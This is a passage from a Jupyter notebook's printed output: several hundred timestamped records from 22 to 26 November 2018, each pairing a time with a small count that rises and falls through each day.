"['2018-11-22 12:35:03', '0']\n",
"['2018-11-22 12:35:45', '0']\n",
"['2018-11-22 12:36:22', '0']\n",
"['2018-11-22 12:36:46', '0']\n",
"['2018-11-22 12:43:52', '1']\n",
"['2018-11-22 12:44:05', '2']\n",
"['2018-11-22 12:45:41', '2']\n",
"['2018-11-22 12:47:26', '2']\n",
"['2018-11-22 12:48:07', '4']\n",
"['2018-11-22 12:49:18', '4']\n",
"['2018-11-22 12:50:25', '4']\n",
"['2018-11-22 12:51:33', '4']\n",
"['2018-11-22 12:51:56', '5']\n",
"['2018-11-22 12:53:59', '5']\n",
"['2018-11-22 12:54:12', '6']\n",
"['2018-11-22 12:56:12', '7']\n",
"['2018-11-22 12:58:06', '7']\n",
"['2018-11-22 13:00:13', '7']\n",
"['2018-11-22 13:02:54', '6']\n",
"['2018-11-22 13:03:57', '6']\n",
"['2018-11-22 13:06:11', '5']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 13:06:55', '4']\n",
"['2018-11-22 13:08:05', '0']\n",
"['2018-11-22 13:12:22', '17']\n",
"['2018-11-22 13:13:50', '19']\n",
"['2018-11-22 13:16:14', '20']\n",
"['2018-11-22 13:17:23', '20']\n",
"['2018-11-22 13:19:37', '22']\n",
"['2018-11-22 13:20:47', '17']\n",
"['2018-11-22 13:22:11', '18']\n",
"['2018-11-22 13:23:25', '9']\n",
"['2018-11-22 13:24:37', '6']\n",
"['2018-11-22 13:26:29', '3']\n",
"['2018-11-22 13:27:16', '2']\n",
"['2018-11-22 13:28:18', '1']\n",
"['2018-11-22 13:30:00', '1']\n",
"['2018-11-22 13:31:01', '1']\n",
"['2018-11-22 13:31:34', '1']\n",
"['2018-11-22 13:32:37', '1']\n",
"['2018-11-22 13:33:28', '0']\n",
"['2018-11-22 13:34:18', '0']\n",
"['2018-11-22 13:35:09', '0']\n",
"['2018-11-22 13:36:00', '0']\n",
"['2018-11-22 13:36:51', '0']\n",
"['2018-11-22 13:37:32', '0']\n",
"['2018-11-22 13:38:03', '0']\n",
"['2018-11-22 13:43:14', '1']\n",
"['2018-11-22 13:43:25', '2']\n",
"['2018-11-22 13:44:57', '2']\n",
"['2018-11-22 13:46:39', '2']\n",
"['2018-11-22 13:47:29', '2']\n",
"['2018-11-22 13:48:01', '2']\n",
"['2018-11-22 13:49:02', '2']\n",
"['2018-11-22 13:49:45', '3']\n",
"['2018-11-22 13:50:28', '4']\n",
"['2018-11-22 13:51:39', '3']\n",
"['2018-11-22 13:52:40', '3']\n",
"['2018-11-22 13:53:33', '3']\n",
"['2018-11-22 13:54:19', '3']\n",
"['2018-11-22 13:55:28', '7']\n",
"['2018-11-22 13:57:18', '8']\n",
"['2018-11-22 13:59:14', '6']\n",
"['2018-11-22 14:01:58', '6']\n",
"['2018-11-22 14:03:30', '6']\n",
"['2018-11-22 14:04:15', '0']\n",
"['2018-11-22 14:08:26', '21']\n",
"['2018-11-22 14:13:12', '22']\n",
"['2018-11-22 14:15:39', '24']\n",
"['2018-11-22 14:18:44', '24']\n",
"['2018-11-22 14:19:09', '25']\n",
"['2018-11-22 14:20:40', '28']\n",
"['2018-11-22 14:21:49', '27']\n",
"['2018-11-22 14:23:46', '22']\n",
"['2018-11-22 14:25:01', '17']\n",
"['2018-11-22 14:26:45', '14']\n",
"['2018-11-22 14:27:34', '8']\n",
"['2018-11-22 14:28:47', '9']\n",
"['2018-11-22 14:30:35', '6']\n",
"['2018-11-22 14:31:45', '7']\n",
"['2018-11-22 14:32:48', '7']\n",
"['2018-11-22 14:34:07', '7']\n",
"['2018-11-22 14:35:09', '3']\n",
"['2018-11-22 14:36:06', '2']\n",
"['2018-11-22 14:37:04', '2']\n",
"['2018-11-22 14:38:02', '2']\n",
"['2018-11-22 14:39:00', '0']\n",
"['2018-11-22 14:39:58', '0']\n",
"['2018-11-22 14:40:56', '0']\n",
"['2018-11-22 14:41:54', '0']\n",
"['2018-11-22 14:42:05', '0']\n",
"['2018-11-22 14:43:30', '0']\n",
"['2018-11-22 14:45:12', '0']\n",
"['2018-11-22 14:45:57', '0']\n",
"['2018-11-22 14:47:01', '1']\n",
"['2018-11-22 14:47:57', '4']\n",
"['2018-11-22 14:49:30', '6']\n",
"['2018-11-22 14:50:52', '6']\n",
"['2018-11-22 14:51:37', '7']\n",
"['2018-11-22 14:52:29', '8']\n",
"['2018-11-22 14:53:49', '12']\n",
"['2018-11-22 14:55:16', '21']\n",
"['2018-11-22 14:56:20', '20']\n",
"['2018-11-22 14:58:12', '23']\n",
"['2018-11-22 14:59:03', '25']\n",
"['2018-11-22 15:01:15', '24']\n",
"['2018-11-22 15:02:04', '24']\n",
"['2018-11-22 15:03:49', '0']\n",
"['2018-11-22 15:11:02', '13']\n",
"['2018-11-22 15:17:38', '13']\n",
"['2018-11-22 15:19:10', '15']\n",
"['2018-11-22 15:21:25', '16']\n",
"['2018-11-22 15:22:22', '20']\n",
"['2018-11-22 15:23:54', '21']\n",
"['2018-11-22 15:25:31', '25']\n",
"['2018-11-22 15:27:36', '17']\n",
"['2018-11-22 15:29:14', '15']\n",
"['2018-11-22 15:32:19', '16']\n",
"['2018-11-22 15:33:08', '13']\n",
"['2018-11-22 15:34:26', '13']\n",
"['2018-11-22 15:35:34', '12']\n",
"['2018-11-22 15:36:34', '9']\n",
"['2018-11-22 15:37:44', '9']\n",
"['2018-11-22 15:38:59', '8']\n",
"['2018-11-22 15:40:32', '2']\n",
"['2018-11-22 15:41:33', '0']\n",
"['2018-11-22 15:42:35', '0']\n",
"['2018-11-22 15:43:37', '0']\n",
"['2018-11-22 15:44:39', '0']\n",
"['2018-11-22 15:45:41', '0']\n",
"['2018-11-22 15:46:43', '0']\n",
"['2018-11-22 15:47:45', '0']\n",
"['2018-11-22 15:47:58', '0']\n",
"['2018-11-22 15:49:18', '0']\n",
"['2018-11-22 15:51:00', '0']\n",
"['2018-11-22 15:51:39', '1']\n",
"['2018-11-22 15:53:02', '1']\n",
"['2018-11-22 15:54:02', '1']\n",
"['2018-11-22 15:54:52', '2']\n",
"['2018-11-22 15:55:47', '3']\n",
"['2018-11-22 15:57:27', '7']\n",
"['2018-11-22 15:58:21', '10']\n",
"['2018-11-22 15:59:52', '13']\n",
"['2018-11-22 16:01:41', '11']\n",
"['2018-11-22 16:03:34', '16']\n",
"['2018-11-22 16:04:51', '13']\n",
"['2018-11-22 16:06:35', '13']\n",
"['2018-11-22 16:07:20', '11']\n",
"['2018-11-22 16:07:33', '8']\n",
"['2018-11-22 16:09:34', '0']\n",
"['2018-11-22 16:11:25', '22']\n",
"['2018-11-22 16:12:29', '22']\n",
"['2018-11-22 16:13:01', '22']\n",
"['2018-11-22 16:15:13', '22']\n",
"['2018-11-22 16:16:06', '13']\n",
"['2018-11-22 16:17:57', '12']\n",
"['2018-11-22 16:19:39', '11']\n",
"['2018-11-22 16:20:54', '7']\n",
"['2018-11-22 16:22:48', '7']\n",
"['2018-11-22 16:23:46', '3']\n",
"['2018-11-22 16:24:31', '2']\n",
"['2018-11-22 16:25:41', '2']\n",
"['2018-11-22 16:26:57', '2']\n",
"['2018-11-22 16:27:59', '2']\n",
"['2018-11-22 16:28:29', '2']\n",
"['2018-11-22 16:29:47', '2']\n",
"['2018-11-22 16:31:14', '2']\n",
"['2018-11-22 16:32:14', '1']\n",
"['2018-11-22 16:33:14', '0']\n",
"['2018-11-22 16:34:14', '0']\n",
"['2018-11-22 16:35:15', '0']\n",
"['2018-11-22 16:35:55', '0']\n",
"['2018-11-22 16:36:53', '0']\n",
"['2018-11-22 16:37:51', '1']\n",
"['2018-11-22 16:38:49', '2']\n",
"['2018-11-22 16:39:47', '2']\n",
"['2018-11-22 16:40:45', '2']\n",
"['2018-11-22 16:41:43', '2']\n",
"['2018-11-22 16:42:41', '2']\n",
"['2018-11-22 16:43:39', '2']\n",
"['2018-11-22 16:44:37', '2']\n",
"['2018-11-22 16:44:58', '3']\n",
"['2018-11-22 16:46:38', '5']\n",
"['2018-11-22 16:47:35', '9']\n",
"['2018-11-22 16:49:33', '13']\n",
"['2018-11-22 16:50:49', '17']\n",
"['2018-11-22 16:52:14', '20']\n",
"['2018-11-22 16:53:58', '26']\n",
"['2018-11-22 16:55:44', '27']\n",
"['2018-11-22 16:58:27', '27']\n",
"['2018-11-22 16:58:45', '28']\n",
"['2018-11-22 17:01:14', '0']\n",
"['2018-11-22 17:04:25', '19']\n",
"['2018-11-22 17:05:38', '20']\n",
"['2018-11-22 17:08:18', '20']\n",
"['2018-11-22 17:09:41', '20']\n",
"['2018-11-22 17:10:06', '24']\n",
"['2018-11-22 17:11:15', '26']\n",
"['2018-11-22 17:12:39', '20']\n",
"['2018-11-22 17:14:55', '19']\n",
"['2018-11-22 17:15:35', '15']\n",
"['2018-11-22 17:16:32', '14']\n",
"['2018-11-22 17:17:29', '12']\n",
"['2018-11-22 17:18:06', '10']\n",
"['2018-11-22 17:19:36', '10']\n",
"['2018-11-22 17:20:33', '10']\n",
"['2018-11-22 17:21:05', '10']\n",
"['2018-11-22 17:22:04', '10']\n",
"['2018-11-22 17:23:00', '2']\n",
"['2018-11-22 17:24:04', '2']\n",
"['2018-11-22 17:25:09', '1']\n",
"['2018-11-22 17:26:14', '1']\n",
"['2018-11-22 17:27:19', '1']\n",
"['2018-11-22 17:28:10', '1']\n",
"['2018-11-22 17:28:34', '0']\n",
"['2018-11-22 17:30:43', '0']\n",
"['2018-11-22 17:30:55', '2']\n",
"['2018-11-22 17:32:21', '2']\n",
"['2018-11-22 17:33:50', '2']\n",
"['2018-11-22 17:34:54', '2']\n",
"['2018-11-22 17:35:31', '2']\n",
"['2018-11-22 17:36:41', '9']\n",
"['2018-11-22 17:37:55', '10']\n",
"['2018-11-22 17:38:43', '11']\n",
"['2018-11-22 17:40:01', '13']\n",
"['2018-11-22 17:40:59', '15']\n",
"['2018-11-22 17:42:27', '14']\n",
"['2018-11-22 17:44:59', '14']\n",
"['2018-11-22 17:45:56', '14']\n",
"['2018-11-22 17:47:11', '11']\n",
"['2018-11-22 17:48:15', '12']\n",
"['2018-11-22 17:50:25', '13']\n",
"['2018-11-22 17:52:23', '13']\n",
"['2018-11-22 17:53:13', '0']\n",
"['2018-11-22 17:59:38', '1']\n",
"['2018-11-25 07:27:28', '0']\n",
"['2018-11-25 07:29:06', '0']\n",
"['2018-11-25 07:29:39', '0']\n",
"['2018-11-25 07:30:21', '0']\n",
"['2018-11-25 07:30:52', '0']\n",
"['2018-11-25 07:32:08', '1']\n",
"['2018-11-25 07:32:48', '1']\n",
"['2018-11-25 07:33:31', '1']\n",
"['2018-11-25 07:34:15', '1']\n",
"['2018-11-25 07:35:29', '0']\n",
"['2018-11-25 07:36:25', '0']\n",
"['2018-11-25 07:37:13', '0']\n",
"['2018-11-25 07:38:26', '0']\n",
"['2018-11-25 07:38:32', '0']\n",
"['2018-11-25 07:40:54', '0']\n",
"['2018-11-25 07:41:36', '0']\n",
"['2018-11-25 07:43:05', '1']\n",
"['2018-11-25 07:44:01', '1']\n",
"['2018-11-25 07:44:34', '1']\n",
"['2018-11-25 07:45:26', '1']\n",
"['2018-11-25 07:46:05', '1']\n",
"['2018-11-25 07:46:59', '1']\n",
"['2018-11-25 07:47:39', '1']\n",
"['2018-11-25 07:48:34', '1']\n",
"['2018-11-25 07:49:19', '1']\n",
"['2018-11-25 07:50:31', '1']\n",
"['2018-11-25 07:51:23', '1']\n",
"['2018-11-25 07:52:10', '1']\n",
"['2018-11-25 07:52:54', '0']\n",
"['2018-11-25 08:01:28', '2']\n",
"['2018-11-25 08:03:32', '2']\n",
"['2018-11-25 08:04:17', '2']\n",
"['2018-11-25 08:05:05', '2']\n",
"['2018-11-25 08:05:59', '2']\n",
"['2018-11-25 08:06:41', '1']\n",
"['2018-11-25 08:08:23', '0']\n",
"['2018-11-25 08:10:24', '0']\n",
"['2018-11-25 08:11:03', '0']\n",
"['2018-11-25 08:12:15', '0']\n",
"['2018-11-25 08:12:44', '0']\n",
"['2018-11-25 08:13:49', '0']\n",
"['2018-11-25 08:15:08', '0']\n",
"['2018-11-25 08:15:15', '0']\n",
"['2018-11-25 08:17:51', '1']\n",
"['2018-11-25 08:20:27', '1']\n",
"['2018-11-25 08:23:04', '1']\n",
"['2018-11-25 08:24:01', '1']\n",
"['2018-11-25 08:24:38', '1']\n",
"['2018-11-25 08:25:19', '0']\n",
"['2018-11-25 08:26:16', '0']\n",
"['2018-11-25 08:27:14', '1']\n",
"['2018-11-25 08:28:29', '1']\n",
"['2018-11-25 08:29:08', '1']\n",
"['2018-11-25 08:31:20', '3']\n",
"['2018-11-25 08:32:35', '3']\n",
"['2018-11-25 08:34:38', '3']\n",
"['2018-11-25 08:36:02', '3']\n",
"['2018-11-25 08:36:44', '0']\n",
"['2018-11-25 08:45:48', '2']\n",
"['2018-11-25 08:47:44', '3']\n",
"['2018-11-25 08:48:32', '3']\n",
"['2018-11-25 08:49:42', '2']\n",
"['2018-11-25 08:51:18', '2']\n",
"['2018-11-25 08:52:48', '2']\n",
"['2018-11-25 08:53:46', '2']\n",
"['2018-11-25 08:54:28', '2']\n",
"['2018-11-25 08:55:06', '2']\n",
"['2018-11-25 08:56:04', '1']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 08:57:17', '0']\n",
"['2018-11-25 08:57:53', '0']\n",
"['2018-11-25 08:59:38', '0']\n",
"['2018-11-25 08:59:43', '0']\n",
"['2018-11-25 09:02:50', '0']\n",
"['2018-11-25 09:05:58', '0']\n",
"['2018-11-25 09:09:06', '0']\n",
"['2018-11-25 09:09:56', '0']\n",
"['2018-11-25 09:10:34', '0']\n",
"['2018-11-25 09:11:27', '0']\n",
"['2018-11-25 09:11:48', '0']\n",
"['2018-11-25 09:12:52', '1']\n",
"['2018-11-25 09:13:43', '1']\n",
"['2018-11-25 09:14:15', '1']\n",
"['2018-11-25 09:15:33', '3']\n",
"['2018-11-25 09:17:42', '3']\n",
"['2018-11-25 09:18:38', '3']\n",
"['2018-11-25 09:18:54', '2']\n",
"['2018-11-25 09:20:34', '0']\n",
"['2018-11-25 09:25:05', '2']\n",
"['2018-11-25 09:29:36', '4']\n",
"['2018-11-25 09:34:07', '4']\n",
"['2018-11-25 09:34:51', '4']\n",
"['2018-11-25 09:36:12', '2']\n",
"['2018-11-25 09:38:00', '2']\n",
"['2018-11-25 09:39:12', '2']\n",
"['2018-11-25 09:40:53', '2']\n",
"['2018-11-25 09:41:21', '2']\n",
"['2018-11-25 09:43:01', '2']\n",
"['2018-11-25 09:43:29', '2']\n",
"['2018-11-25 09:44:16', '2']\n",
"['2018-11-25 09:45:32', '2']\n",
"['2018-11-25 09:45:38', '0']\n",
"['2018-11-25 09:47:56', '2']\n",
"['2018-11-25 09:50:14', '2']\n",
"['2018-11-25 09:52:33', '2']\n",
"['2018-11-25 09:53:32', '2']\n",
"['2018-11-25 09:54:15', '2']\n",
"['2018-11-25 09:55:13', '2']\n",
"['2018-11-25 09:55:35', '2']\n",
"['2018-11-25 09:56:16', '2']\n",
"['2018-11-25 09:57:42', '2']\n",
"['2018-11-25 09:59:03', '2']\n",
"['2018-11-25 10:00:35', '2']\n",
"['2018-11-25 10:02:54', '2']\n",
"['2018-11-25 10:03:54', '2']\n",
"['2018-11-25 10:05:21', '2']\n",
"['2018-11-25 10:06:05', '0']\n",
"['2018-11-25 10:17:07', '8']\n",
"['2018-11-25 10:18:26', '8']\n",
"['2018-11-25 10:19:50', '7']\n",
"['2018-11-25 10:20:34', '7']\n",
"['2018-11-25 10:22:13', '6']\n",
"['2018-11-25 10:22:51', '6']\n",
"['2018-11-25 10:24:21', '4']\n",
"['2018-11-25 10:25:26', '3']\n",
"['2018-11-25 10:27:13', '3']\n",
"['2018-11-25 10:28:31', '2']\n",
"['2018-11-25 10:28:53', '2']\n",
"['2018-11-25 10:30:16', '1']\n",
"['2018-11-25 10:32:22', '1']\n",
"['2018-11-25 10:32:30', '0']\n",
"['2018-11-25 10:35:34', '1']\n",
"['2018-11-25 10:36:09', '1']\n",
"['2018-11-25 10:37:27', '1']\n",
"['2018-11-25 10:38:30', '1']\n",
"['2018-11-25 10:40:05', '3']\n",
"['2018-11-25 10:41:06', '3']\n",
"['2018-11-25 10:41:31', '3']\n",
"['2018-11-25 10:43:30', '11']\n",
"['2018-11-25 10:45:15', '13']\n",
"['2018-11-25 10:46:28', '12']\n",
"['2018-11-25 10:48:31', '16']\n",
"['2018-11-25 10:50:19', '17']\n",
"['2018-11-25 10:51:20', '17']\n",
"['2018-11-25 10:52:22', '17']\n",
"['2018-11-25 10:53:18', '0']\n",
"['2018-11-25 11:02:50', '10']\n",
"['2018-11-25 11:03:51', '10']\n",
"['2018-11-25 11:05:44', '10']\n",
"['2018-11-25 11:07:51', '11']\n",
"['2018-11-25 11:08:25', '6']\n",
"['2018-11-25 11:09:54', '7']\n",
"['2018-11-25 11:11:44', '7']\n",
"['2018-11-25 11:12:23', '0']\n",
"['2018-11-25 11:14:24', '0']\n",
"['2018-11-25 11:15:31', '0']\n",
"['2018-11-25 11:16:00', '0']\n",
"['2018-11-25 11:16:50', '0']\n",
"['2018-11-25 11:18:08', '0']\n",
"['2018-11-25 11:18:14', '0']\n",
"['2018-11-25 11:21:35', '4']\n",
"['2018-11-25 11:22:06', '4']\n",
"['2018-11-25 11:23:09', '4']\n",
"['2018-11-25 11:24:24', '5']\n",
"['2018-11-25 11:24:49', '11']\n",
"['2018-11-25 11:26:32', '11']\n",
"['2018-11-25 11:26:54', '11']\n",
"['2018-11-25 11:28:34', '17']\n",
"['2018-11-25 11:30:02', '17']\n",
"['2018-11-25 11:31:27', '18']\n",
"['2018-11-25 11:33:01', '18']\n",
"['2018-11-25 11:35:13', '19']\n",
"['2018-11-25 11:36:58', '12']\n",
"['2018-11-25 11:37:53', '12']\n",
"['2018-11-25 11:38:39', '0']\n",
"['2018-11-25 11:46:26', '3']\n",
"['2018-11-25 11:48:29', '5']\n",
"['2018-11-25 11:49:00', '5']\n",
"['2018-11-25 11:50:38', '4']\n",
"['2018-11-25 11:51:44', '5']\n",
"['2018-11-25 11:54:22', '5']\n",
"['2018-11-25 11:55:59', '5']\n",
"['2018-11-25 11:57:28', '5']\n",
"['2018-11-25 11:58:15', '5']\n",
"['2018-11-25 11:59:16', '2']\n",
"['2018-11-25 12:00:00', '2']\n",
"['2018-11-25 12:01:16', '2']\n",
"['2018-11-25 12:02:33', '1']\n",
"['2018-11-25 12:02:58', '0']\n",
"['2018-11-25 12:06:38', '3']\n",
"['2018-11-25 12:07:09', '3']\n",
"['2018-11-25 12:08:09', '3']\n",
"['2018-11-25 12:08:58', '7']\n",
"['2018-11-25 12:09:57', '7']\n",
"['2018-11-25 12:11:44', '8']\n",
"['2018-11-25 12:12:04', '8']\n",
"['2018-11-25 12:12:48', '8']\n",
"['2018-11-25 12:13:57', '10']\n",
"['2018-11-25 12:14:54', '11']\n",
"['2018-11-25 12:16:15', '12']\n",
"['2018-11-25 12:17:00', '12']\n",
"['2018-11-25 12:19:08', '11']\n",
"['2018-11-25 12:20:11', '11']\n",
"['2018-11-25 12:20:55', '0']\n",
"['2018-11-25 12:31:47', '8']\n",
"['2018-11-25 12:33:30', '9']\n",
"['2018-11-25 12:34:47', '9']\n",
"['2018-11-25 12:36:20', '9']\n",
"['2018-11-25 12:36:32', '5']\n",
"['2018-11-25 12:37:43', '4']\n",
"['2018-11-25 12:39:02', '3']\n",
"['2018-11-25 12:40:12', '4']\n",
"['2018-11-25 12:42:02', '4']\n",
"['2018-11-25 12:43:05', '3']\n",
"['2018-11-25 12:43:31', '3']\n",
"['2018-11-25 12:44:30', '3']\n",
"['2018-11-25 12:45:41', '1']\n",
"['2018-11-25 12:46:05', '0']\n",
"['2018-11-25 12:50:30', '0']\n",
"['2018-11-25 12:51:07', '0']\n",
"['2018-11-25 12:52:22', '1']\n",
"['2018-11-25 12:53:47', '1']\n",
"['2018-11-25 12:54:47', '1']\n",
"['2018-11-25 12:56:06', '3']\n",
"['2018-11-25 12:56:49', '4']\n",
"['2018-11-25 12:58:01', '4']\n",
"['2018-11-25 12:58:45', '4']\n",
"['2018-11-25 12:59:34', '2']\n",
"['2018-11-25 13:01:41', '4']\n",
"['2018-11-25 13:03:32', '4']\n",
"['2018-11-25 13:04:42', '4']\n",
"['2018-11-25 13:04:55', '6']\n",
"['2018-11-25 13:06:24', '0']\n",
"['2018-11-25 13:15:46', '5']\n",
"['2018-11-25 13:17:28', '8']\n",
"['2018-11-25 13:18:25', '8']\n",
"['2018-11-25 13:19:30', '7']\n",
"['2018-11-25 13:19:47', '7']\n",
"['2018-11-25 13:22:07', '8']\n",
"['2018-11-25 13:22:34', '6']\n",
"['2018-11-25 13:24:31', '5']\n",
"['2018-11-25 13:25:59', '4']\n",
"['2018-11-25 13:27:44', '3']\n",
"['2018-11-25 13:28:33', '3']\n",
"['2018-11-25 13:29:55', '3']\n",
"['2018-11-25 13:31:05', '3']\n",
"['2018-11-25 13:31:11', '0']\n",
"['2018-11-25 13:34:34', '2']\n",
"['2018-11-25 13:35:09', '4']\n",
"['2018-11-25 13:36:06', '4']\n",
"['2018-11-25 13:37:34', '5']\n",
"['2018-11-25 13:38:31', '5']\n",
"['2018-11-25 13:39:29', '5']\n",
"['2018-11-25 13:39:52', '5']\n",
"['2018-11-25 13:40:45', '5']\n",
"['2018-11-25 13:42:34', '5']\n",
"['2018-11-25 13:44:25', '7']\n",
"['2018-11-25 13:46:45', '7']\n",
"['2018-11-25 13:47:37', '7']\n",
"['2018-11-25 13:48:26', '7']\n",
"['2018-11-25 13:48:41', '5']\n",
"['2018-11-25 13:50:22', '0']\n",
"['2018-11-25 14:00:57', '26']\n",
"['2018-11-25 14:02:34', '29']\n",
"['2018-11-25 14:03:48', '27']\n",
"['2018-11-25 14:06:06', '27']\n",
"['2018-11-25 14:08:41', '12']\n",
"['2018-11-25 14:10:45', '12']\n",
"['2018-11-25 14:11:46', '11']\n",
"['2018-11-25 14:13:15', '8']\n",
"['2018-11-25 14:15:07', '2']\n",
"['2018-11-25 14:16:15', '2']\n",
"['2018-11-25 14:16:42', '1']\n",
"['2018-11-25 14:17:33', '1']\n",
"['2018-11-25 14:18:49', '1']\n",
"['2018-11-25 14:18:55', '0']\n",
"['2018-11-25 14:21:26', '1']\n",
"['2018-11-25 14:22:13', '1']\n",
"['2018-11-25 14:23:40', '1']\n",
"['2018-11-25 14:25:09', '2']\n",
"['2018-11-25 14:26:13', '2']\n",
"['2018-11-25 14:27:11', '2']\n",
"['2018-11-25 14:27:31', '2']\n",
"['2018-11-25 14:28:53', '2']\n",
"['2018-11-25 14:29:51', '2']\n",
"['2018-11-25 14:30:40', '7']\n",
"['2018-11-25 14:33:15', '9']\n",
"['2018-11-25 14:36:42', '9']\n",
"['2018-11-25 14:40:07', '9']\n",
"['2018-11-25 14:41:13', '11']\n",
"['2018-11-25 14:42:14', '0']\n",
"['2018-11-25 14:44:31', '11']\n",
"['2018-11-25 14:46:03', '14']\n",
"['2018-11-25 14:47:28', '13']\n",
"['2018-11-25 14:49:20', '11']\n",
"['2018-11-25 14:51:21', '12']\n",
"['2018-11-25 14:52:20', '10']\n",
"['2018-11-25 14:53:12', '7']\n",
"['2018-11-25 14:54:07', '4']\n",
"['2018-11-25 14:55:15', '3']\n",
"['2018-11-25 14:56:54', '1']\n",
"['2018-11-25 14:57:46', '0']\n",
"['2018-11-25 14:58:53', '0']\n",
"['2018-11-25 15:00:02', '0']\n",
"['2018-11-25 15:00:07', '0']\n",
"['2018-11-25 15:00:51', '0']\n",
"['2018-11-25 15:01:20', '0']\n",
"['2018-11-25 15:02:36', '2']\n",
"['2018-11-25 15:03:44', '3']\n",
"['2018-11-25 15:04:29', '4']\n",
"['2018-11-25 15:05:24', '4']\n",
"['2018-11-25 15:06:02', '6']\n",
"['2018-11-25 15:07:23', '9']\n",
"['2018-11-25 15:08:27', '9']\n",
"['2018-11-25 15:09:20', '13']\n",
"['2018-11-25 15:10:43', '15']\n",
"['2018-11-25 15:11:55', '15']\n",
"['2018-11-25 15:13:20', '13']\n",
"['2018-11-25 15:14:08', '12']\n",
"['2018-11-25 15:16:19', '0']\n",
"['2018-11-25 16:11:08', '24']\n",
"['2018-11-25 16:12:28', '24']\n",
"['2018-11-25 16:13:13', '24']\n",
"['2018-11-25 16:14:16', '22']\n",
"['2018-11-25 16:15:59', '20']\n",
"['2018-11-25 16:17:03', '15']\n",
"['2018-11-25 16:18:28', '5']\n",
"['2018-11-25 16:20:16', '2']\n",
"['2018-11-25 16:22:06', '2']\n",
"['2018-11-25 16:23:02', '2']\n",
"['2018-11-25 16:23:26', '2']\n",
"['2018-11-25 16:24:01', '1']\n",
"['2018-11-25 16:25:30', '0']\n",
"['2018-11-25 16:25:53', '0']\n",
"['2018-11-25 16:29:36', '3']\n",
"['2018-11-25 16:30:14', '3']\n",
"['2018-11-25 16:31:15', '3']\n",
"['2018-11-25 16:32:31', '5']\n",
"['2018-11-25 16:33:02', '5']\n",
"['2018-11-25 16:34:23', '9']\n",
"['2018-11-25 16:34:42', '9']\n",
"['2018-11-25 16:35:25', '9']\n",
"['2018-11-25 16:36:51', '11']\n",
"['2018-11-25 16:37:13', '8']\n",
"['2018-11-25 16:38:23', '9']\n",
"['2018-11-25 16:40:30', '9']\n",
"['2018-11-25 16:42:25', '8']\n",
"['2018-11-25 16:43:26', '8']\n",
"['2018-11-25 16:44:11', '0']\n",
"['2018-11-25 17:40:49', '3']\n",
"['2018-11-25 17:41:58', '3']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 17:44:21', '4']\n",
"['2018-11-25 17:45:55', '4']\n",
"['2018-11-25 17:46:09', '2']\n",
"['2018-11-25 17:47:49', '3']\n",
"['2018-11-25 17:48:14', '2']\n",
"['2018-11-25 17:50:09', '1']\n",
"['2018-11-25 17:51:45', '1']\n",
"['2018-11-25 17:52:55', '1']\n",
"['2018-11-25 17:53:19', '1']\n",
"['2018-11-25 17:54:05', '1']\n",
"['2018-11-25 17:55:11', '0']\n",
"['2018-11-25 17:55:30', '0']\n",
"['2018-11-25 17:57:29', '0']\n",
"['2018-11-25 17:59:28', '0']\n",
"['2018-11-25 18:01:27', '0']\n",
"['2018-11-25 18:02:32', '0']\n",
"['2018-11-25 18:03:32', '2']\n",
"['2018-11-25 18:04:26', '2']\n",
"['2018-11-25 18:04:47', '2']\n",
"['2018-11-25 18:06:18', '3']\n",
"['2018-11-25 18:07:35', '2']\n",
"['2018-11-25 18:08:14', '2']\n",
"['2018-11-25 18:10:08', '13']\n",
"['2018-11-25 18:12:36', '13']\n",
"['2018-11-25 18:13:44', '13']\n",
"['2018-11-25 18:13:57', '10']\n",
"['2018-11-25 18:16:35', '0']\n",
"['2018-11-25 19:10:38', '24']\n",
"['2018-11-25 19:12:55', '25']\n",
"['2018-11-25 19:13:48', '25']\n",
"['2018-11-25 19:15:07', '24']\n",
"['2018-11-25 19:16:27', '20']\n",
"['2018-11-25 19:18:37', '24']\n",
"['2018-11-25 19:20:27', '19']\n",
"['2018-11-25 19:22:12', '13']\n",
"['2018-11-25 19:24:00', '13']\n",
"['2018-11-25 19:24:57', '9']\n",
"['2018-11-25 19:25:44', '2']\n",
"['2018-11-25 19:26:56', '2']\n",
"['2018-11-25 19:28:01', '2']\n",
"['2018-11-25 19:28:06', '0']\n",
"['2018-11-25 19:30:43', '2']\n",
"['2018-11-25 19:31:13', '2']\n",
"['2018-11-25 19:32:07', '0']\n",
"['2018-11-25 19:33:28', '0']\n",
"['2018-11-25 19:34:27', '2']\n",
"['2018-11-25 19:35:18', '2']\n",
"['2018-11-25 19:35:51', '2']\n",
"['2018-11-25 19:36:55', '2']\n",
"['2018-11-25 19:39:10', '3']\n",
"['2018-11-25 19:39:58', '3']\n",
"['2018-11-25 19:41:14', '2']\n",
"['2018-11-25 19:43:07', '2']\n",
"['2018-11-25 19:45:04', '2']\n",
"['2018-11-25 19:46:46', '2']\n",
"['2018-11-25 19:47:36', '0']\n",
"['2018-11-25 20:40:44', '9']\n",
"['2018-11-25 20:42:03', '9']\n",
"['2018-11-25 20:42:41', '9']\n",
"['2018-11-25 20:43:56', '9']\n",
"['2018-11-25 20:44:28', '9']\n",
"['2018-11-25 20:44:58', '9']\n",
"['2018-11-25 20:46:47', '7']\n",
"['2018-11-25 20:47:49', '7']\n",
"['2018-11-25 20:48:57', '7']\n",
"['2018-11-25 20:49:55', '5']\n",
"['2018-11-25 20:50:43', '3']\n",
"['2018-11-25 20:51:51', '1']\n",
"['2018-11-25 20:53:35', '1']\n",
"['2018-11-25 20:53:41', '0']\n",
"['2018-11-25 21:01:04', '0']\n",
"['2018-11-25 21:01:37', '0']\n",
"['2018-11-25 21:02:59', '1']\n",
"['2018-11-25 21:04:03', '5']\n",
"['2018-11-25 21:04:58', '7']\n",
"['2018-11-25 21:05:44', '7']\n",
"['2018-11-25 21:05:57', '7']\n",
"['2018-11-25 21:06:26', '7']\n",
"['2018-11-25 21:06:47', '5']\n",
"['2018-11-25 21:07:37', '7']\n",
"['2018-11-25 21:09:20', '5']\n",
"['2018-11-25 21:11:35', '5']\n",
"['2018-11-25 21:12:18', '5']\n",
"['2018-11-25 21:12:29', '3']\n",
"['2018-11-25 21:13:39', '0']\n",
"['2018-11-26 06:59:31', '1']\n",
"['2018-11-26 07:00:21', '2']\n",
"['2018-11-26 07:01:19', '2']\n",
"['2018-11-26 07:02:03', '3']\n",
"['2018-11-26 07:02:49', '4']\n",
"['2018-11-26 07:04:07', '4']\n",
"['2018-11-26 07:04:19', '3']\n",
"['2018-11-26 07:05:07', '5']\n",
